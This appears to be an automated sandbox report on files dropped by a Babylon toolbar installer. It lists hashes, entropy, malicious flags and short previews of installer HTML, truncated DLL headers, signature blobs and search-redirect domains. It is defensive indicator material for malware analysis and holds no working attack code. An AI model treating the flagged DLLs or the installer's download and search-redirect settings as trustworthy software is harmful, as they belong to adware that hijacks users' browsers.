                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!-trkInfo=[TType:5012_7];#DQ0BWQFd4nGNiYGZiYGEFYjYgNgFiFiYGZkYHZ&3ikhQ3twjPvOKSHAX9nLx022gfRz&3WAX9xLScEtukxKTi4hIF&dK8TKCKxJwcx5wcBgEwiJ2ruxMA0PcVLQ;#DQyEgeJxjYmBmYmBhBWI2IDYCYi5GVsYGARB41vZ8IgAW5QQg;$http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132096
                                                                                                                                                            Entropy (8bit):6.077194684081875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:aKpmHnzBkCQDQsjqpw/pAsRiYt5+IvNkGNr3jk2zzfrFabmhu5J0tHS+f:aKpmHnCClMSNK+ETHfrFar5J0tF
                                                                                                                                                            MD5:B212865E7E478A28A97268F960079A8D
                                                                                                                                                            SHA1:DED201AE02FB9EA3646489AFEDA49270C4620D9C
                                                                                                                                                            SHA-256:D6138AEF3F7674E2442ADD75013C86CA8FDA3D5BA69737A9B881E7F7BBC730E6
                                                                                                                                                            SHA-512:D973F9CB45D2035A8546BBDF77FA1B239A3F1E4BA2B17D32195A1CFED13FE06AAF48B91A133CEBD7E53481AB5A5E9166329B730587B46A154B193779DA6AD737
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12384
                                                                                                                                                            Entropy (8bit):5.999166475309639
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6SqGSumjR7rVILJ7hzEJboFI1BI1x7RpjEie/X6S8k0oP0dNdNhkAU0RSB2rBkEl:iGJmRyJyJb71C1x7R4a+0RSGPB
                                                                                                                                                            MD5:825E5733974586A0A1229A53361ED13E
                                                                                                                                                            SHA1:9EC5B8944C6727FDA6FDC3C18856884554CF6B31
                                                                                                                                                            SHA-256:0A90B96EAF5D92D33B36F73B36B7F9CE3971E5F294DA51ED04DA3FB43DD71A96
                                                                                                                                                            SHA-512:FF039E86873A1014B1F8577AEC9B4230126B41CC204A6911CD372D224B8C07996D4BB2728A06482C5E98FB21F2D525395491F29D428CDD5796A26E372AF5AD4E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):644
                                                                                                                                                            Entropy (8bit):5.2453607077208835
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4WhPHMNUyXUoZhYpNtlVGlKN7HClolEJqNYMxhCRCBRPGu:hMNmMvy4WJHGp/YEaREJNMN5
                                                                                                                                                            MD5:F50FA4673555652289652753183FD1EE
                                                                                                                                                            SHA1:F496797F0D34EB866D6328D2FD1492B485F74D0A
                                                                                                                                                            SHA-256:AFB21B51CEAD30ED14F79293D50B9C3C7A706B5287AAD6CDE06EA44A364DF812
                                                                                                                                                            SHA-512:6E92B13343AD35A8A8C61E54CE3ABB9A28ABEEC4AA8C765326E0D1EC111C7656D8F0F349C44820FB1ABA6730C22F84F7411C0C0B24322BDAA8A977B79BAA23DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 220px;">.. <div>.. <div style="text-align:center; font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_LOADING</div>.. <div style="margin:5px auto; width:32px;">.. <img id="roundProgress" src="pBar.gif" />.. </div>.. </div>.. </div>..</body>..</html>..
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.348370067881831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4Wh7qJmuMu5+nulOlkkQ2VMCHMNUyXUoZhY+dDNtloNGlomqNt:hMNmMvy4Wa9XlgkkQ+MCHGp/Y+dFzsx5
                                                                                                                                                            MD5:0C464E407C81764EBC09EACBE41F0B3E
                                                                                                                                                            SHA1:245AFE550A05215E5873D8F5F21C22D12AA46B6A
                                                                                                                                                            SHA-256:770A302BC58B513472AA603AE44A365A6F4F8CBDDC13D2692F71B09F143F8A26
                                                                                                                                                            SHA-512:71070FCD243CBB3E4452874ECAF8E20E13CBBBAD0009CE543CA49601FACC1AB1906C298849D3B8FB5747DF1109F8E85946243EC7BFA0EAD97CA0AED9EC8D3DFC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <script type="text/javascript">.. function exitSetup() {... window.external.openPage('{"name":"error"}');...}.. function onXBtnPress() {... exitSetup();... return true;.. }.. </script>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 500px;">.. <div>.. <div style="font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_NAV_ERROR</div>.. <div style="margin:30px auto; width:32px;">.. <input type="button" id="exit" value="BTN_CLOSE" class="BAB_BhvElm" onclick="exitSetup()" style="behavior: url(#default#BabDefBhv:text);" />.. </div>.. </div>.. </div>..</body>..</html>..
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3208
                                                                                                                                                            Entropy (8bit):7.524069178961416
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3CwXprsPLjhI4TRpiPDZmjbzpB0IDmkgl/gpx2ugG1LyZtAegoA/3wlSMilKphGa:3J5YPxIRiq/qpx2F3ZtA1oC3TMnphOQ
                                                                                                                                                            MD5:26621CB27BBC94F6BAB3561791AC013B
                                                                                                                                                            SHA1:4010A489350CF59FD8F36F8E59B53E724C49CC5B
                                                                                                                                                            SHA-256:E512D5B772FEF448F724767662E3A6374230157E35CAB6F4226496ACC7AA7AD3
                                                                                                                                                            SHA-512:9A19E8F233113519B22D9F3B205F2A3C1B59669A0431A5C3EF6D7ED66882B93C8582F3BAA13DF4647BCC265D19F7C6543758623044315105479D2533B11F92C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6144
                                                                                                                                                            Entropy (8bit):4.32136921936664
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/JWaDD77eJq0VOs/i5VSweLvuRBUlXVCt6:BT77Gq0ss/4SweoBwk
                                                                                                                                                            MD5:A21DE5067618D4F2DF261416315ED120
                                                                                                                                                            SHA1:7759A3318DE2ABC3755EBB7F50322C6D586B5286
                                                                                                                                                            SHA-256:6D13D2967A37BA76F840CD45DBA565C5D64938A99D886243F01713CD018E53CA
                                                                                                                                                            SHA-512:6B5C40D09A9548FDE90C1B1127A36E813525BEA6FF80D5FB0911DDEF67954B209DF44CBF4714CD00C4E2E4DA90CFC4967DB7174C28F751F7C5B881FA18CC938A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..............................o.......o.......o......Rich............................PE..L.....P...........!......................... ......................................V}....@..........................#..w...."..P....`.......................p......P ............................................... ..L............................text............................... ..`.rdata....... ......................@..@.data.... ...0......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132096
                                                                                                                                                            Entropy (8bit):6.077194684081875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:aKpmHnzBkCQDQsjqpw/pAsRiYt5+IvNkGNr3jk2zzfrFabmhu5J0tHS+f:aKpmHnCClMSNK+ETHfrFar5J0tF
                                                                                                                                                            MD5:B212865E7E478A28A97268F960079A8D
                                                                                                                                                            SHA1:DED201AE02FB9EA3646489AFEDA49270C4620D9C
                                                                                                                                                            SHA-256:D6138AEF3F7674E2442ADD75013C86CA8FDA3D5BA69737A9B881E7F7BBC730E6
                                                                                                                                                            SHA-512:D973F9CB45D2035A8546BBDF77FA1B239A3F1E4BA2B17D32195A1CFED13FE06AAF48B91A133CEBD7E53481AB5A5E9166329B730587B46A154B193779DA6AD737
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5..w[..w[..w[.....w[.....w[.....w[..%..w[.. ..w[..5..w[..wZ.pw[.....w[.....w[..%..w[.....w[.Rich.w[.........PE..L.....P...........!.....V..........(p.......p...............................`............@.........................`...S.......d.... .......................0.......r..................................@............p......l...`....................text....U.......V.................. ..`.rdata...K...p...L...Z..............@..@.data..../..........................@....SHARDAT. ......."..................@....rsrc........ ......................@..@.reloc... ...0..."..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12384
                                                                                                                                                            Entropy (8bit):5.999166475309639
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6SqGSumjR7rVILJ7hzEJboFI1BI1x7RpjEie/X6S8k0oP0dNdNhkAU0RSB2rBkEl:iGJmRyJyJb71C1x7R4a+0RSGPB
                                                                                                                                                            MD5:825E5733974586A0A1229A53361ED13E
                                                                                                                                                            SHA1:9EC5B8944C6727FDA6FDC3C18856884554CF6B31
                                                                                                                                                            SHA-256:0A90B96EAF5D92D33B36F73B36B7F9CE3971E5F294DA51ED04DA3FB43DD71A96
                                                                                                                                                            SHA-512:FF039E86873A1014B1F8577AEC9B4230126B41CC204A6911CD372D224B8C07996D4BB2728A06482C5E98FB21F2D525395491F29D428CDD5796A26E372AF5AD4E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Ao...............................d......2.......................................................'...Babylon Trial..........2.............................................................'...Babylon..........2..............'...Englishtown..........2............................................................................'...Babylon..........2....'...Babylon Viewer..........2........................... ......'...Babylon Public..........2........................'..-Babylon Online/Offline Viewer..........2........................'..%Babylon Online Viewer..........2........................'..&Babylon Offline Viewer..........2........................'..&Babylon Premium Viewer..........2................................ ......'..#Babylon-Pro Classic..........2............................................................................'..+Babylon (Corporate Edition)..........2.......................................... ......'.."Babylon (Standard)..........2..............'...Englishtown.......
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):644
                                                                                                                                                            Entropy (8bit):5.2453607077208835
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4WhPHMNUyXUoZhYpNtlVGlKN7HClolEJqNYMxhCRCBRPGu:hMNmMvy4WJHGp/YEaREJNMN5
                                                                                                                                                            MD5:F50FA4673555652289652753183FD1EE
                                                                                                                                                            SHA1:F496797F0D34EB866D6328D2FD1492B485F74D0A
                                                                                                                                                            SHA-256:AFB21B51CEAD30ED14F79293D50B9C3C7A706B5287AAD6CDE06EA44A364DF812
                                                                                                                                                            SHA-512:6E92B13343AD35A8A8C61E54CE3ABB9A28ABEEC4AA8C765326E0D1EC111C7656D8F0F349C44820FB1ABA6730C22F84F7411C0C0B24322BDAA8A977B79BAA23DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 220px;">.. <div>.. <div style="text-align:center; font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_LOADING</div>.. <div style="margin:5px auto; width:32px;">.. <img id="roundProgress" src="pBar.gif" />.. </div>.. </div>.. </div>..</body>..</html>..
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.348370067881831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4Wh7qJmuMu5+nulOlkkQ2VMCHMNUyXUoZhY+dDNtloNGlomqNt:hMNmMvy4Wa9XlgkkQ+MCHGp/Y+dFzsx5
                                                                                                                                                            MD5:0C464E407C81764EBC09EACBE41F0B3E
                                                                                                                                                            SHA1:245AFE550A05215E5873D8F5F21C22D12AA46B6A
                                                                                                                                                            SHA-256:770A302BC58B513472AA603AE44A365A6F4F8CBDDC13D2692F71B09F143F8A26
                                                                                                                                                            SHA-512:71070FCD243CBB3E4452874ECAF8E20E13CBBBAD0009CE543CA49601FACC1AB1906C298849D3B8FB5747DF1109F8E85946243EC7BFA0EAD97CA0AED9EC8D3DFC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <script type="text/javascript">.. function exitSetup() {... window.external.openPage('{"name":"error"}');...}.. function onXBtnPress() {... exitSetup();... return true;.. }.. </script>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 500px;">.. <div>.. <div style="font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_NAV_ERROR</div>.. <div style="margin:30px auto; width:32px;">.. <input type="button" id="exit" value="BTN_CLOSE" class="BAB_BhvElm" onclick="exitSetup()" style="behavior: url(#default#BabDefBhv:text);" />.. </div>.. </div>.. </div>..</body>..</html>..
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3208
                                                                                                                                                            Entropy (8bit):7.524069178961416
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3CwXprsPLjhI4TRpiPDZmjbzpB0IDmkgl/gpx2ugG1LyZtAegoA/3wlSMilKphGa:3J5YPxIRiq/qpx2F3ZtA1oC3TMnphOQ
                                                                                                                                                            MD5:26621CB27BBC94F6BAB3561791AC013B
                                                                                                                                                            SHA1:4010A489350CF59FD8F36F8E59B53E724C49CC5B
                                                                                                                                                            SHA-256:E512D5B772FEF448F724767662E3A6374230157E35CAB6F4226496ACC7AA7AD3
                                                                                                                                                            SHA-512:9A19E8F233113519B22D9F3B205F2A3C1B59669A0431A5C3EF6D7ED66882B93C8582F3BAA13DF4647BCC265D19F7C6543758623044315105479D2533B11F92C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6144
                                                                                                                                                            Entropy (8bit):4.32136921936664
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/JWaDD77eJq0VOs/i5VSweLvuRBUlXVCt6:BT77Gq0ss/4SweoBwk
                                                                                                                                                            MD5:A21DE5067618D4F2DF261416315ED120
                                                                                                                                                            SHA1:7759A3318DE2ABC3755EBB7F50322C6D586B5286
                                                                                                                                                            SHA-256:6D13D2967A37BA76F840CD45DBA565C5D64938A99D886243F01713CD018E53CA
                                                                                                                                                            SHA-512:6B5C40D09A9548FDE90C1B1127A36E813525BEA6FF80D5FB0911DDEF67954B209DF44CBF4714CD00C4E2E4DA90CFC4967DB7174C28F751F7C5B881FA18CC938A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..............................o.......o.......o......Rich............................PE..L.....P...........!......................... ......................................V}....@..........................#..w...."..P....`.......................p......P ............................................... ..L............................text............................... ..`.rdata....... ......................@..@.data.... ...0......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91790
                                                                                                                                                            Entropy (8bit):7.9969876797429755
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:YYMRZJnf4lTn61qnl4nJszUaFsQZFWT9a5wSFU/BTi5MjmMoa7OYCVumZJBE:YYgJmOs4nJwFRZFSa5vUoumaE8mZJBE
                                                                                                                                                            MD5:407846797C5BA247ABEB5FA7C0C0BA05
                                                                                                                                                            SHA1:44386455EED8E74D75E95E9E81E96A19F0B27884
                                                                                                                                                            SHA-256:0147B5B11B935310752666FCF1E6AFC922B76FF03D01A0D1EE2BABEAC10CA1E3
                                                                                                                                                            SHA-512:7399A9228F971698DB7362AAD28D3F9694C0BF453D4529E48BC7869AF0960452CFE1A5F0A5754E7D567D81B5AA1E35BE05A9E36EC745E5470D20FD44A61D20AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205
                                                                                                                                                            Entropy (8bit):4.9535990881965635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SC2nnnPjnu5AqBQW1ALepBTY2EUHgLJpB1GHGDusAY75E8SlQkQGEie0GUGl:SDnPoPB/mLepBREUALJv1TX9EDKJ5sGl
                                                                                                                                                            MD5:90713AB7A74884CD36A5FB4CFCDECE8A
                                                                                                                                                            SHA1:7BB56D08FD69A98E543B923BD0A9156F92A9C473
                                                                                                                                                            SHA-256:BC40813F6D07DBC1A4D4C74363460D1AD6EE76275729DE4C4F10EC40D8CC46EB
                                                                                                                                                            SHA-512:639D68135FB54264F2E21081D6CA9FFE73A94035982F4A2D7133D6D402CDD3EF4A695EEB61AD173DC6D1B8167D1F5DF2BE61A972C96F07AC357ECEC887A0D191
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A>..................c.......e..HKEY_NONE........babtb1........8..babylonsig=0000ddc5393a3898d6fab33f1b7634f4cacf2f4dc9ddfcbcc1defbd0ce593049:0000d32e061a0029c5ccdae47322435ba6e55cac53459f5d334a8ccfc03203ca
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.747151880874695
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnn/9HNhcGVUDTERd8oDFLSbhlVEHgUVwkdHYzHcLSTp43FQClB/YcYN:LChgnl8GVUDTERCoDt8V8PVwkFYqSVgE
                                                                                                                                                            MD5:4F6E1FDBEF102CDBD379FDAC550B9F48
                                                                                                                                                            SHA1:5DA6EE5B88A4040C80E5269E0CD2B0880B20659C
                                                                                                                                                            SHA-256:E58EA352C050E6353FB5B4FA32A97800298C1603489D3B47794509AF6C89EC4C
                                                                                                                                                            SHA-512:54EFC9BDE44F332932A97396E59ECA5B6EA1AC72F929CCFFA1BDAB96DC3AE8D61E126ADBD26D12D0BC83141CEE03B24AD2BADA411230C4708B7A9AE9C60AECBE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A...................j........<\...babylonsig=000073e9c01f6a45cc864dc02a0f7bf8bcabc4db855fc5bd7a04d0abc34be5df:0000050db25f8bdf7e3b9e906bf562b69d8997079c552e0c644fd006193bd428
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):249
                                                                                                                                                            Entropy (8bit):5.365979053267958
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:t8knqres54xUSIJY7rsNXVO5HzVUTA010HkiYKoYb7orHTMS:t8knqPCxUNYXsFcNzVUM0109Y6/ozTT
                                                                                                                                                            MD5:A4AF0A0C254B38F2F9EECBF0E00B08FE
                                                                                                                                                            SHA1:EF730BCE77699730DDA378DC444B997CE7CEEA7A
                                                                                                                                                            SHA-256:810E0E32D54B9E1557DA7CCF1CA9F6354814E90DADC6B4AF5E1CBDF87FAC925A
                                                                                                                                                            SHA-512:B74596E55E75413303559C135DB393A04D6FD6CBAB147A51AC2F46435F52B92B82868DE4E67917A7B388D82C672FA36B525B88E2EEFE7EC40695F028395DCD84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@i....................@YHKEY_CLASSES_ROOT\AppID\{BDB69379-802F-4eaf-B541-F8DE92DD98DB}\Instl\Data...........babylonsig=000100374627dcb412ef9c7f6e6383eb408216ef2e8c99cab4a28ea690db202a:00006cc208e02b54e138d1ec1b02ef66d0b7f8e02d0d3a2c12c6a72548b0fc07
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.1257718700950665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:elm7gnnn7nlun8FxIEyLdKC1xZ1jPAUFA9EHANrQ3wV39VuVUjKGBTc6+HYXDwDe:fgn8n8zIxdK2HG7EgNEg39MmIYXUDQQU
                                                                                                                                                            MD5:6358860CD0C336C1F91F86BE701D77C4
                                                                                                                                                            SHA1:5DD38B818BF0860B4C5144BA670A759D4345E4EC
                                                                                                                                                            SHA-256:2ED42E3C958EB21352BAE4B00DB2FA5BE94149ABC64EEC93E5258B9C4A715457
                                                                                                                                                            SHA-512:7DF3B3E1487D3A65000B6208969F1E695815133C052F369BEB36877FE5C6F64D979AEFD030A193B04A5E46FB0D97A3CC06837AA381EFE6BC24A0C084C768DAC1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@Z..............2........."search.babylon.com.......$www.claro-search.com...... .........9...babylonsig=000014b501afb12514e838be35fd24590f9f095658a0cdd234df33a6003ea621:0000627597f0acd7d524976ccd69bab0cb4198771d23d12f21d1af554430d7ef
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):178
                                                                                                                                                            Entropy (8bit):4.797553801917334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PC2nnnxnzkS2gfE8JfizV3RT3d/7lkVVYQdyFE6MBvhShRO7H/bSGPX:62n+S2V8Vu3139lkVVYX+NB8ADT1PX
                                                                                                                                                            MD5:0B7BE9C4B72C2C5166BFD61CA5EBBFED
                                                                                                                                                            SHA1:AEA0AA4E8226C1B4EFCE92E909DA773744BAA6D4
                                                                                                                                                            SHA-256:673BF972D308BC6108360575608CF72F393413F2D3993489B06DA4A6EFC749BD
                                                                                                                                                            SHA-512:4DCD7EA01B05550ACB00B71E7E9FDD52A04FE1CC574655030DCAE94B87DAD86BFB7973ADF9185DE03BCACB100FFF758B1A2F928FCB951E2B31E320860A2226D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A#..............2.................b+..babylonsig=0000b7d47988ec9b6d29c69c2d65aa0453a80949ffe47b173bcbcbaf1664b37f:0000d475e18513509c850255a7e329dacbd702f4edee04be1371ccd95bc05742
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.752125358171384
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnnShk1X3slFi0U6tgFnlHOW8O+NYXnbcE0aBSVXdE1TbSXQK:LChgnShklvkWFnd+2XbciSV0SXQK
                                                                                                                                                            MD5:7E72D256E34635D351092955D1F8516B
                                                                                                                                                            SHA1:7F240F8F4BD61AE59247D84D0EC85F5BC8729F36
                                                                                                                                                            SHA-256:39EB1667A67149B5D930E5408896027E3C3FC06282735E61CB8D85F5B38F587C
                                                                                                                                                            SHA-512:621EB4BF2864DB2FA0F861C233CED790124E9060C081948BEB7117F8C058A36ECCA23EE05CE2D6D42AF15533C050F648D276589682D91DFE699EBE871CC9AE8C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A..............................o|.babylonsig=0000f7ffd199a6d07f03f6b2b8764a34a26e4dc1ed5ba9a3d998872127314113:0000cb9730cf6e41158f8f209a78d8121f40b07026490a300c0a084fb724d516
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
